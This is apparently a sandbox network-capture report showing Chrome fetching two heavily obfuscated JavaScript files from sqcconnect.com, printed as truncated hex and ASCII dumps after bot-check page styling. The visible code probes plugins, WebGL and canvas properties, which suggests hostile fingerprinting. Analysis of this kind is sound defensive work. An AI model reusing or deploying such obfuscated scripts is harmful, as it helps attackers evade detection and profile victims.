                                        2024-12-17 14:46:16 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                        2024-12-17 14:46:16 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                        2024-12-17 14:46:16 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                        2024-12-17 14:46:16 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.1749731103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:17 UTC491OUTGET /editor/f.js HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:17 UTC213INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:17 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 17 Dec 2024 12:26:55 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 53997
                                        Connection: close
                                        Content-Type: text/javascript
                                        2024-12-17 14:46:17 UTC7979INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 63 65 31 31 61 3d 61 30 5f 30 78 32 35 66 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 31 35 31 35 2c 5f 30 78 31 38 66 62 64 34 29 7b 63 6f 6e 73 74 20 5f 30 78 36 33 62 61 64 63 3d 61 30 5f 30 78 32 35 66 32 2c 5f 30 78 32 65 34 36 61 66 3d 5f 30 78 33 61 31 35 31 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 65 34 62 35 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 63 37 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 31 39 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28 30 78 31 66 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 62 61 64 63 28
                                        Data Ascii: const a0_0xce11a=a0_0x25f2;(function(_0x3a1515,_0x18fbd4){const _0x63badc=a0_0x25f2,_0x2e46af=_0x3a1515();while(!![]){try{const _0x5e4b53=-parseInt(_0x63badc(0x1c7))/0x1*(-parseInt(_0x63badc(0x119))/0x2)+parseInt(_0x63badc(0x1fb))/0x3+-parseInt(_0x63badc(
                                        2024-12-17 14:46:18 UTC8000INData Raw: 28 30 78 31 33 64 29 29 5b 5f 30 78 35 36 61 33 33 34 28 30 78 31 63 65 29 5d 28 5f 30 78 31 66 32 35 36 39 28 30 78 31 62 66 29 29 3a 41 72 72 61 79 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 30 36 29 5d 28 6e 61 76 69 67 61 74 6f 72 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 35 30 29 5d 29 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 65 65 29 5d 28 5f 30 78 34 34 66 36 61 35 3d 3e 28 7b 27 74 79 70 65 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 66 30 29 5d 2c 27 64 65 73 63 72 69 70 74 69 6f 6e 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 32 61 38 29 2b 27 6e 27 5d 2c 27 73 75 66 66 69 78 65 73 27 3a 5f 30 78 34 34 66 36 61 35 5b 5f 30 78 31 66 32 35 36 39 28 30 78 31 65 39 29 5d 7d 29 29 3b 7d 63 61
                                        Data Ascii: (0x13d))[_0x56a334(0x1ce)](_0x1f2569(0x1bf)):Array[_0x1f2569(0x206)](navigator[_0x1f2569(0x250)])[_0x1f2569(0x1ee)](_0x44f6a5=>({'type':_0x44f6a5[_0x1f2569(0x1f0)],'description':_0x44f6a5[_0x1f2569(0x2a8)+'n'],'suffixes':_0x44f6a5[_0x1f2569(0x1e9)]}));}ca
                                        2024-12-17 14:46:18 UTC8000INData Raw: 28 30 78 32 62 63 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 31 36 30 29 2b 5f 30 78 35 64 37 66 63 61 28 30 78 65 33 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 31 63 37 29 2b 27 4d 53 27 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 37 34 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 65 39 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 61 30 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 35 35 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 31 63 38 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 35 34 29 2c 5f 30 78 35 64 37 66 63 61 28 30 78 31 61 34 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 32 30 29 2c 5f 30 78 32 34 39 33 33 62 28 30 78 32 32 38 29 2b 27 75 61 27 2c 5f 30 78 35 64 37 66 63 61 28 30 78 66 64 29 2b 5f 30 78 32 34 39 33 33 62 28 30 78 32 62 64 29 2c 5f 30
                                        Data Ascii: (0x2bc),_0x5d7fca(0x160)+_0x5d7fca(0xe3),_0x24933b(0x1c7)+'MS',_0x24933b(0x274),_0x5d7fca(0xe9),_0x24933b(0x2a0),_0x24933b(0x255),_0x24933b(0x1c8),_0x24933b(0x254),_0x5d7fca(0x1a4),_0x24933b(0x220),_0x24933b(0x228)+'ua',_0x5d7fca(0xfd)+_0x24933b(0x2bd),_0
                                        2024-12-17 14:46:18 UTC8000INData Raw: 50 54 48 5f 42 49 54 53 27 3a 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 34 32 63 36 62 36 28 30 78 31 66 31 29 2b 27 65 72 27 5d 28 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 38 29 5d 29 2c 27 53 54 45 4e 43 49 4c 5f 42 49 54 53 27 3a 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 35 29 2b 27 65 72 27 5d 28 5f 30 78 35 65 32 33 31 62 5b 5f 30 78 32 62 31 36 63 64 28 30 78 32 37 64 29 2b 27 54 53 27 5d 29 7d 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 35 37 63 63 33 3b 7d 63 61 74 63 68 28 5f 30 78 34 31 37 61 32 65 29 7b 69 66 28 5f 30 78 34 32 63 36 62 36 28 30 78 31 37 66 29 21 3d 3d 5f 30 78 32 62 31 36 63 64 28 30 78 32 33 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 65 6c 73 65 20 5f 30 78 31 33 35 32 36
                                        Data Ascii: PTH_BITS':_0x5e231b[_0x42c6b6(0x1f1)+'er'](_0x5e231b[_0x2b16cd(0x278)]),'STENCIL_BITS':_0x5e231b[_0x2b16cd(0x275)+'er'](_0x5e231b[_0x2b16cd(0x27d)+'TS'])}};return _0x357cc3;}catch(_0x417a2e){if(_0x42c6b6(0x17f)!==_0x2b16cd(0x23a))return null;else _0x13526
                                        2024-12-17 14:46:18 UTC8000INData Raw: 66 64 20 6f 66 20 5f 30 78 34 39 62 64 36 63 29 7b 5f 30 78 32 38 66 30 64 30 5b 5f 30 78 33 30 61 64 37 38 28 30 78 32 38 66 29 5d 5b 5f 30 78 35 39 34 32 39 62 28 30 78 32 36 36 29 5d 3d 5f 30 78 32 62 65 64 65 32 2b 27 2c 27 2b 5f 30 78 34 39 38 62 66 64 2c 5f 30 78 33 63 35 32 31 31 5b 5f 30 78 32 32 31 37 66 66 28 30 78 31 34 38 29 2b 27 64 27 5d 28 5f 30 78 35 39 38 35 32 37 29 3b 63 6f 6e 73 74 20 5f 30 78 35 37 65 30 65 33 3d 5f 30 78 32 37 36 62 38 39 5b 5f 30 78 34 34 31 62 37 32 28 30 78 32 37 62 29 2b 27 68 27 5d 21 3d 3d 5f 30 78 34 37 61 31 66 34 5b 5f 30 78 34 39 38 62 66 64 5d 7c 7c 5f 30 78 34 39 32 30 64 61 5b 5f 30 78 32 32 31 37 66 66 28 30 78 31 35 35 29 2b 27 68 74 27 5d 21 3d 3d 5f 30 78 35 37 39 38 32 64 5b 5f 30 78 34 39 38 62 66
                                        Data Ascii: fd of _0x49bd6c){_0x28f0d0[_0x30ad78(0x28f)][_0x59429b(0x266)]=_0x2bede2+','+_0x498bfd,_0x3c5211[_0x2217ff(0x148)+'d'](_0x598527);const _0x57e0e3=_0x276b89[_0x441b72(0x27b)+'h']!==_0x47a1f4[_0x498bfd]||_0x4920da[_0x2217ff(0x155)+'ht']!==_0x57982d[_0x498bf
                                        2024-12-17 14:46:18 UTC8000INData Raw: 21 3d 3d 5f 30 78 31 39 62 37 38 66 28 30 78 32 33 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 65 6c 73 65 20 5f 30 78 34 37 64 37 32 63 28 27 30 27 29 3b 7d 7d 7d 7d 65 6c 73 65 7b 69 66 28 28 27 27 2b 5f 30 78 33 64 37 37 33 61 2f 5f 30 78 33 64 37 37 33 61 29 5b 5f 30 78 35 33 61 33 63 39 28 30 78 32 34 65 29 5d 21 3d 3d 30 78 31 7c 7c 5f 30 78 33 64 37 37 33 61 25 30 78 31 34 3d 3d 3d 30 78 30 29 7b 69 66 28 27 4d 51 43 74 53 27 3d 3d 3d 5f 30 78 35 33 61 33 63 39 28 30 78 31 65 37 29 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 36 30 37 31 35 3d 5f 30 78 31 31 38 63 34 35 3b 69 66 28 5f 30 78 35 36 30 37 31 35 28 30 78 31 34 36 29 21 3d 3d 27 57 76 4a 70 76 27 29 7b 5f 30 78 34 64 35 62 63 36 5b 5f 30 78 34 62 65 34 38 62 28
                                        Data Ascii: !==_0x19b78f(0x23a))return null;else _0x47d72c('0');}}}}else{if((''+_0x3d773a/_0x3d773a)[_0x53a3c9(0x24e)]!==0x1||_0x3d773a%0x14===0x0){if('MQCtS'===_0x53a3c9(0x1e7))(function(){const _0x560715=_0x118c45;if(_0x560715(0x146)!=='WvJpv'){_0x4d5bc6[_0x4be48b(
                                        2024-12-17 14:46:18 UTC6018INData Raw: 64 66 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 30 35 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 38 32 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 33 61 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 34 34 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 65 35 29 2c 27 38 34 39 30 30 77 43 45 4d 58 27 2b 27 49 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 39 36 29 2c 27 42 4c 55 45 5f 42 49 54 53 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 66 62 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 39 63 29 2c 27 70 61 72 73 65 5c 78 32 30 73 65 72 76 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 63 63 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31 62 36 29 2c 5f 30 78 35 34 37 66 37 63 28 30 78 63 65 29 2c 27 4f 66 41 66 6a 27 2c 5f 30 78 35 34 37 66 37 63 28 30 78 31
                                        Data Ascii: df),_0x547f7c(0x105),_0x547f7c(0x182),_0x547f7c(0x13a),_0x547f7c(0x144),_0x547f7c(0x1e5),'84900wCEMX'+'I',_0x547f7c(0x196),'BLUE_BITS',_0x547f7c(0xfb),_0x547f7c(0x19c),'parse\x20serv',_0x547f7c(0x1cc),_0x547f7c(0x1b6),_0x547f7c(0xce),'OfAfj',_0x547f7c(0x1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.1749730103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:17 UTC497OUTGET /editor/scripts.js HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:17 UTC213INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:17 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 17 Dec 2024 12:26:57 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 73775
                                        Connection: close
                                        Content-Type: text/javascript
                                        2024-12-17 14:46:17 UTC7979INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 34 33 34 37 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 63 38 34 61 32 64 20 3d 20 5b 27 79 6e 63 53 63 72 69 70 74 49 27 2c 20 27 41 41 41 42 43 41 59 41 41 41 27 2c 20 27 72 65 61 73 6f 6e 73 27 2c 20 27 50 56 79 47 5a 27 2c 20 27 77 47 50 62 65 27 2c 20 27 68 69 45 51 6e 27 2c 20 27 5f 65 76 61 6c 75 61 74 65 27 2c 20 27 70 65 72 6d 69 73 73 69 6f 6e 27 2c 20 27 65 42 41 46 55 27 2c 20 27 41 66 46 63 53 4a 41 41 41 41 27 2c 20 27 63 61 6c 6c 65 64 53 65 6c 65 27 2c 20 27 67 67 65 72 27 2c 20 27 4f 72 4c 71 4e 27 2c 20 27 45 72 72 6f 72 5c 78 32 30 66 65 74 63 27 2c 20 27 73 73 69 6f 6e 73 3a 27 2c 20 27 67 5f 72 65 6e 64 65 72 65 72 27 2c 20 27 73 63 72 6f 6c 6c 27 2c 20 27 72 5f 75 6e 77 72 61 70 70 65 27 2c 20
                                        Data Ascii: function a0_0x4347() { const _0xc84a2d = ['yncScriptI', 'AAABCAYAAA', 'reasons', 'PVyGZ', 'wGPbe', 'hiEQn', '_evaluate', 'permission', 'eBAFU', 'AfFcSJAAAA', 'calledSele', 'gger', 'OrLqN', 'Error\x20fetc', 'ssions:', 'g_renderer', 'scroll', 'r_unwrappe',
                                        2024-12-17 14:46:18 UTC8000INData Raw: 28 5f 30 78 33 37 36 63 65 38 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 30 38 39 39 34 20 3d 20 6e 75 6c 6c 2c 20 5f 30 78 33 34 66 35 65 38 3b 20 7d 20 7d 20 7d 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 7d 3b 20 72 65 74 75 72 6e 20 5f 30 78 33 36 34 38 31 64 20 3d 20 21 5b 5d 2c 20 5f 30 78 33 61 37 66 30 35 3b 20 7d 20 7d 3b 20 7d 28 29 29 3b 20 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 62 33 65 61 39 20 3d 20 61 30 5f 30 78 33 32 38 61 3b 20 69 66 20 28 27 55 70 72 4e 75 27 20 21 3d 3d 20 5f 30 78 35 62 33 65 61 39 28 30 78 32 34 65 29 29 20 5f 30 78 32 35 63 36 30 65 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 39 65 36 38 32 20
                                        Data Ascii: (_0x376ce8, arguments); return _0x108994 = null, _0x34f5e8; } } } : function () { }; return _0x36481d = ![], _0x3a7f05; } }; }()); (function () { const _0x5b3ea9 = a0_0x328a; if ('UprNu' !== _0x5b3ea9(0x24e)) _0x25c60e(this, function () { const _0x39e682
                                        2024-12-17 14:46:18 UTC8000INData Raw: 20 5f 30 78 32 37 64 61 37 30 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 64 38 29 5d 20 3d 3d 3d 20 5f 30 78 34 31 31 35 63 38 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 65 63 29 5d 20 7c 7c 20 21 28 5f 30 78 33 64 66 61 61 35 28 30 78 31 66 61 29 20 69 6e 20 5f 30 78 66 32 66 65 62 31 29 20 7c 7c 20 5f 30 78 35 32 38 35 65 36 5b 5f 30 78 37 31 39 38 38 33 28 30 78 32 61 37 29 5d 28 29 20 3c 20 30 78 61 3b 20 65 6c 73 65 20 74 68 69 73 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 62 61 29 20 2b 20 5f 30 78 37 31 39 38 38 33 28 30 78 31 36 36 29 5d 2b 2b 3b 20 7d 20 74 68 69 73 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 61 35 29 20 2b 20 27 73 27 5d 20 3d 20 30 78 30 2c 20 74 68 69 73 5b 5f 30 78 37 31 39 38 38 33 28 30 78 32 63 30 29 20 2b 20 27 73 27 5d 20 3d
                                        Data Ascii: _0x27da70[_0x3dfaa5(0x2d8)] === _0x4115c8[_0x3dfaa5(0x2ec)] || !(_0x3dfaa5(0x1fa) in _0xf2feb1) || _0x5285e6[_0x719883(0x2a7)]() < 0xa; else this[_0x3dfaa5(0x2ba) + _0x719883(0x166)]++; } this[_0x3dfaa5(0x2a5) + 's'] = 0x0, this[_0x719883(0x2c0) + 's'] =
                                        2024-12-17 14:46:18 UTC8000INData Raw: 6c 73 65 20 72 65 74 75 72 6e 20 21 21 5b 5d 3b 20 7d 20 65 6c 73 65 20 72 65 74 75 72 6e 20 21 21 5b 5d 3b 20 7d 20 5b 5f 30 78 66 38 32 34 63 36 28 30 78 32 33 31 29 20 2b 20 5f 30 78 66 38 32 34 63 36 28 30 78 32 32 62 29 5d 28 5f 30 78 35 38 38 32 30 65 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 32 66 66 63 62 20 3d 20 5f 30 78 33 62 31 65 66 37 3b 20 69 66 20 28 5f 30 78 35 32 66 66 63 62 28 30 78 31 64 65 29 20 3d 3d 3d 20 5f 30 78 35 32 66 66 63 62 28 30 78 32 63 38 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 65 62 35 34 66 20 3d 20 5f 30 78 34 36 66 37 65 39 3b 20 69 66 20 28 5f 30 78 32 65 62 35 34 66 28 30 78 32 37 36 29 20 21 3d 3d 20 5f 30 78 35 32 66 66 63 62 28 30 78 32 31 34 29 29 20 74 68 69 73 5b 5f 30 78 32 65 62 35 34 66 28 30 78 32 39
                                        Data Ascii: lse return !![]; } else return !![]; } [_0xf824c6(0x231) + _0xf824c6(0x22b)](_0x58820e) { const _0x52ffcb = _0x3b1ef7; if (_0x52ffcb(0x1de) === _0x52ffcb(0x2c8)) { const _0x2eb54f = _0x46f7e9; if (_0x2eb54f(0x276) !== _0x52ffcb(0x214)) this[_0x2eb54f(0x29
                                        2024-12-17 14:46:18 UTC8000INData Raw: 5d 20 3d 20 5f 30 78 34 36 38 33 32 39 5b 5f 30 78 32 62 36 66 64 36 28 30 78 32 33 62 29 5d 2c 20 5f 30 78 31 62 31 32 63 30 5b 5f 30 78 34 39 35 35 61 64 28 30 78 32 31 61 29 5d 20 3d 20 5f 30 78 33 37 65 62 38 34 2c 20 5f 30 78 35 38 37 37 64 61 28 5f 30 78 31 62 31 32 63 30 29 3b 20 7d 20 7d 20 5b 5f 30 78 66 38 32 34 63 36 28 30 78 32 65 31 29 20 2b 20 5f 30 78 66 38 32 34 63 36 28 30 78 32 65 30 29 5d 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 63 61 36 31 37 20 3d 20 5f 30 78 33 62 31 65 66 37 3b 20 69 66 20 28 5f 30 78 32 63 61 36 31 37 28 30 78 32 37 33 29 20 21 3d 3d 20 5f 30 78 32 63 61 36 31 37 28 30 78 31 38 65 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 35 34 39 65 38 20 3d 20 5f 30 78 66 38 32 34 63 36 2c 20 5f 30 78 31 34 63 30 38 64 20
                                        Data Ascii: ] = _0x468329[_0x2b6fd6(0x23b)], _0x1b12c0[_0x4955ad(0x21a)] = _0x37eb84, _0x5877da(_0x1b12c0); } } [_0xf824c6(0x2e1) + _0xf824c6(0x2e0)]() { const _0x2ca617 = _0x3b1ef7; if (_0x2ca617(0x273) !== _0x2ca617(0x18e)) { const _0x3549e8 = _0xf824c6, _0x14c08d
                                        2024-12-17 14:46:18 UTC8000INData Raw: 63 28 30 78 32 31 61 29 5d 20 3d 20 5f 30 78 33 33 32 36 37 2c 20 5f 30 78 31 38 66 33 31 66 28 5f 30 78 34 64 30 31 31 32 29 3b 20 7d 20 65 6c 73 65 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 35 64 31 66 64 20 3d 20 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 62 35 64 61 63 28 30 78 31 66 63 29 20 2b 20 5f 30 78 32 62 35 64 61 63 28 30 78 32 63 32 29 5d 28 5f 30 78 63 31 34 31 32 35 28 30 78 32 33 61 29 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 33 35 64 31 66 64 5b 5f 30 78 63 31 34 31 32 35 28 30 78 31 62 62 29 5d 28 5f 30 78 32 62 35 64 61 63 28 30 78 31 65 37 29 29 20 7c 7c 20 5f 30 78 33 35 64 31 66 64 5b 5f 30 78 32 62 35 64 61 63 28 30 78 32 34 66 29 5d 28 5f 30 78 32 62 35 64 61 63 28 30 78 32 36 61 29 20 2b 20 5f 30 78 32 62 35 64 61 63 28 30 78 31 64 35 29
                                        Data Ascii: c(0x21a)] = _0x33267, _0x18f31f(_0x4d0112); } else { const _0x35d1fd = document[_0x2b5dac(0x1fc) + _0x2b5dac(0x2c2)](_0xc14125(0x23a)); return _0x35d1fd[_0xc14125(0x1bb)](_0x2b5dac(0x1e7)) || _0x35d1fd[_0x2b5dac(0x24f)](_0x2b5dac(0x26a) + _0x2b5dac(0x1d5)
                                        2024-12-17 14:46:18 UTC8000INData Raw: 30 36 29 3b 20 65 6c 73 65 20 7b 20 69 66 20 28 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 31 29 20 21 3d 3d 20 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 31 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 37 30 35 31 37 20 3d 20 5f 30 78 31 34 64 34 33 32 5b 5f 30 78 35 38 61 39 33 34 28 30 78 32 63 64 29 5d 28 5f 30 78 31 64 39 61 64 34 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 34 31 30 34 62 31 20 3d 20 6e 75 6c 6c 2c 20 5f 30 78 32 37 30 35 31 37 3b 20 7d 20 65 6c 73 65 20 7b 20 69 66 20 28 5f 30 78 34 34 61 35 39 66 5b 5f 30 78 35 65 37 33 31 62 28 30 78 32 38 34 29 5d 28 2f 66 69 72 65 66 6f 78 7c 66 78 69 6f 73 2f 69 29 29 20 5f 30 78 34 30 35 63 36 39 20 3d 20 5f 30 78 35 31 39 64 38 65 28 30 78 31 37 64 29 3b 20 65 6c 73
